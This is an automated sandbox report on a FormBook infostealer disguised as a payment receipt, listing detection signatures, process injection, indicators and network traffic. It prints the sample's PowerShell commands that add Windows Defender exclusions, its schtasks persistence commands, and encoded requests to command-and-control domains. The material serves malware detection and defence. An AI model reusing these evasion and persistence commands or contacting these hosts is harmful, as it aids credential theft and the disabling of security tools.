
Windows Analysis Report
PAYMENT RECEIPT_USD21,000.exe

Overview

General Information

Sample name: PAYMENT RECEIPT_USD21,000.exe
Analysis ID: 1622568
MD5: 917aa64000d9391e7f6644f3fe2805c8
SHA1: 762fe40a55d991688d274b833ef26646ea47d606
SHA256: 026eb5a5186c705c0be93317796f3203bee1d50716b77a842f14e9e322dd470e
Tags: exe, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PAYMENT RECEIPT_USD21,000.exe (PID: 1680 cmdline: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe" MD5: 917AA64000D9391E7F6644F3FE2805C8)
    • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7460 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5612 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7304 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • VfJW2xm7a.exe (PID: 4180 cmdline: "C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\jyn0JCT2oB.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • wlanext.exe (PID: 7816 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • VfJW2xm7a.exe (PID: 3628 cmdline: "C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7964 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • fttQgpyzkkc.exe (PID: 7436 cmdline: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe MD5: 917AA64000D9391E7F6644F3FE2805C8)
    • schtasks.exe (PID: 7608 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7680 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Memory dumps:

Source | Rule | Description | Author | Strings
00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Unpacked PEs:

Source | Rule | Description | Author | Strings
9.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ProcessId: 7096, ProcessName: powershell.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe, ParentImage: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe, ParentProcessId: 7436, ParentProcessName: fttQgpyzkkc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp", ProcessId: 7608, ProcessName: schtasks.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", ProcessId: 5612, ProcessName: schtasks.exe
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ProcessId: 7096, ProcessName: powershell.exe

                Persistence and Installation Behavior

                Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", ProcessId: 5612, ProcessName: schtasks.exe
                No Suricata rule has matched

                AV Detection

                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe, ReversingLabs: Detection: 36%
                Source: PAYMENT RECEIPT_USD21,000.exe, ReversingLabs: Detection: 36%
                Source: PAYMENT RECEIPT_USD21,000.exe, Virustotal: Detection: 44%
                Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: PAYMENT RECEIPT_USD21,000.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PAYMENT RECEIPT_USD21,000.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: dLtX.pdb source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: dLtX.pdbSHA256 source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VfJW2xm7a.exe, 00000010.00000000.2203131007.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp, VfJW2xm7a.exe, 00000012.00000002.4517727575.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe, Code function: 4x nop then jmp 0730B18Ah, 10_2_0730B5CD

                Networking

                Source: DNS query: www.needethereum.xyz
                Source: DNS query: www.myfort.xyz
                Source: DNS query: www.kedutaan.xyz
                Source: DNS query: www.nevath.xyz
                Source: DNS query: www.fstudy.xyz
                Source: DNS query: www.conpactum.xyz
                Source: DNS query: www.nagwagi.xyz
                Source: global traffic, TCP traffic: 192.168.2.5:53200 -> 162.159.36.2:53
                Source: Joe Sandbox View, IP Address: 13.248.169.48
                Source: Joe Sandbox View, IP Address: 47.83.1.90
                Source: Joe Sandbox View, ASN Name: AMAZON-02US
                Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVNPTCorpVN
                Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /4vzl/?RF0t=ch5dbZhpJZwxM&fjF4t=34Lyoguue/ZRNqb6y592ViDXl1ETk4WFJ/hL/W3KZfXMHxeZqgTMo5RLneqnA8kgjAhzHF0e7jsaAudU+8CwvVjATSxT1ARM9ZETmUao+kHbXujpBnqMKlG7RRXCivG0nw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.needethereum.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /xqx9/?fjF4t=yKFRxSnc59btqEDWkG4f1mA08fQtykFKEHyRKSiaROYhOb0ocaHjQpR8CouySbLt1Ca/sA3ZASHSjJCktm40YHEO0LVyiREwOtmtzF7Jk7kiZIBnx0g4uHKK1v//NosybA==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.myfort.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /2f0x/?fjF4t=KttBANyMFCMHyjVlhguaw4w+FOhxb+RFMCG1RBkM4lZRj0tz+pUlcfZuaGNcwmkG/tlADW94/u/n6qVk66ZBjnaa65ODvbXTfHQnH9YQE2AekJuH1z6JciJdqtungYribQ==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.kedutaan.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /w1jw/?fjF4t=FEsgf818Qy4NuwHBEIOvD988sEsBYT1YIqxYhkBisKCh+ZsP2UzNKQMRoHyY3GTw2NtU/ASHEwd/ObWWKYOm3As7v7YGAnBPRCCHEokvb4U326rMZugykuz2GNZjV6Uq/Q==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.primepath.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /rkj7/?fjF4t=/5TEs0/gy+K4LCfX0N5V2DRC24LIq0ltkM4FEpm3l/SyyBvzaEu9TquaFMDCNHy8LAwEyrpN+W7o0magr9hCI+z9nI91eJEVHu5WBNxARfCUGLvs1K/9iv05n9OhXDh8ug==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.limanbetgirislinki.fitUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /puqt/?fjF4t=drGrhokrlRrEYuDWt0OJz4Ng6KJaghcbR1C/f3uJtjeKiD81PgtT6wBn+7K3ePb2401ZwAv82H3TfvfvLQM6N7VBZ3mjq2uRkdcB946Aq6KqI+OPqxc4Zv4uRJqxgh4Qyg==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.amtdevelopment.proUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /t592/?RF0t=ch5dbZhpJZwxM&fjF4t=5G9JgWCrRv/lf92zCOZkKJykrgHBYS4VWLV72Qu70fhIXGvAtKpGNi3j5YgE2pTksYz/+Gu6WCPD40ehRSX/GShHF177bl+TjQnArXr7bgkGGddGUN4R/KQnNEe9GlDvag== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.amzavy.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /9coe/?fjF4t=G107bRRRDsnoWJ2JhClzu0zeUy/skI/DtoHAa4UfWjmX8GkD4kiW6knx/7EXVkNc3Q6v4cEQl/XbcNsFTcgd2vNzs8EutXPjgPFQGc0U76fueDyWor3EeiPytQW0W+TLHw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.thisisnonft.studioUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /pc8v/?fjF4t=RA6YG/kITrTUzv1Ir6oMFjfpkiqkIwOu1GrMpQfsofu9KgfV866pOx/zpeHqw3yYMw1wUvSAS0XIUUtoYyLhFXHuejN1GQTBbcaAURWT0yZi4qilazCHzNhJc4tuU/rPvw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.nevath.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /v2vx/?fjF4t=HeKInfSBrNZWMbEH+jRwpgXlugazE5tEyQKa3d84OZNKksDn2kRDQpi07vt+3gKmBpdSmetPPuOzzYFML0E9gKtonHsogB9osPTHt5AJmdlwX9Dj8hBRoR9jaIy+VNF+xQ==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.fstudy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /0la8/?fjF4t=JeHLTm9NbM7uXLGkYCdiXWBMiWKfyaOxQwSOG2ODV+sj/JIjYRLvMo1a7ITBF45D7AOgtjIjNFzQOPLUJtEsboGaUJsDFDF1nQuu/0as5yoaTY3QBQc4o1BCqzJlsgLV6g==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.conpactum.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /rg2p/?fjF4t=TlKFe+d35Apu3/mseXpuPf41KXdbz4jzYuDfc77EpcUq6bydtIGWQj5xXXa0XlIvqgCgN05XiUVJLc/fLNZa0aXVGUu4UDC5CBhHDcV+TYT/criYkAzFObXguKWBgmefaQ==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.fandatv.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /3bhb/?fjF4t=sL5yMLd2FYeygdxeEIvBIUJATH+hR9jTWzzciCFMdKLUtT5KyNs8m+FI5sdRuxE6SnYGbNiE6d4kQgxaXEFskhjEc+g4L8pNQ6Iw2gTgcz2BGD7t6jx2AFaiuzL6hq7vRw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.nagwagi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /nnzm/?fjF4t=1Cn9cwGlPcxkozyn/QxQVSyt/Fhi8VjB79+KMkYxvXhakNZDqqRaeSSrKQAjUMucgEm9T8ybz5k5gHJ1SxmoQ3zT0TlxDU/EDvhtRqwfutL7i7Qqa656wXycWWkC+AmSWg==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.spacewalker.appUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ss5l/?fjF4t=MZ6hDPItOp3DWI1NZHE1UlRpEwhGpVB3+XHb7RTZ7n905/gqyZTRh0dsgYkJdVt0wXBS/CFStR2ZbfuNZlYleQZC51C+nIWr41eWo5Lt7T+CPfBWt0SnRpP3PTgH9jhFCw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.arasmm.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global traffic, DNS traffic detected: DNS query: www.needethereum.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.myfort.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.kedutaan.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.primepath.net
                Source: global traffic, DNS traffic detected: DNS query: www.limanbetgirislinki.fit
                Source: global traffic, DNS traffic detected: DNS query: www.amtdevelopment.pro
                Source: global traffic, DNS traffic detected: DNS query: www.amzavy.info
                Source: global traffic, DNS traffic detected: DNS query: www.thisisnonft.studio
                Source: global traffic, DNS traffic detected: DNS query: www.nevath.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.fstudy.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.conpactum.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.fandatv.net
                Source: global traffic, DNS traffic detected: DNS query: www.nagwagi.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.spacewalker.app
                Source: global traffic, DNS traffic detected: DNS query: www.arasmm.info
                Source: unknown, HTTP traffic detected: POST /xqx9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCache-Control: no-cacheConnection: closeContent-Length: 206Content-Type: application/x-www-form-urlencodedHost: www.myfort.xyzOrigin: http://www.myfort.xyzReferer: http://www.myfort.xyz/xqx9/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko, Data Ascii: fjF4t=/Itxyn/gztHl8GGjgHMSlX1T8ess2WI0UnzHIDb7S+ojFv0xW73aaIU3FY3VSLfegDLj4yTKFCPz3r+SoytFT38h0p9/kBp1W9uF213bu4tzYrZA/TlbsVPV5vGhCIQ9KYfl9fByp7kq8oj9e+KSt2u0nxoy2IugwceyYT9SLBYoKV5qf1VsPCp/5KhL3dQ/WgdRbVw=
